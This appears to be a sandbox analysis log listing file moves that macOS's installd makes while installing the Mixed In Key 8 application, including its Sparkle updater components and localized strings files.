Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_L6vQRn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKVolumeAnalyzer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_NHMmlC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysisCuePoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_JgVVWy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKBeatAnalyzer.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_pMdZOi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKEnergySegment.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_bHpW08 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftIOKit.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignature/.BC.T_5fzi26 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/.BC.T_xdyGqM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/.BC.T_h7N3bP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/.BC.T_F9azqT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/MacOS/com.andymatuschak.Sparkle.SandboxService	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/.BC.T_nca4zE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/MacOS/Autoupdate	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_NJzGou -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/de.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_MC2ntM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/he.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_8ctT2J -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_0uLYRr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/el.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_UU4Vlc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ja.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_ASNNXY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/en.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_h2Q3h4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_Dif3g6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_80ck1C -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_FrnMQZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_077WqY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_VZjH49 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_39XHnc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_3p9qmX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_MijB4F -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_0oP5gw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_AaLvFH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_VX1Bq8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_lnaCal -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/ko.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_0W3Wth -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/no.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_AMnkNI -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/hu.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_XueMAa -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_h5VwEG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_2htfIe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.strings	Jump to behavior
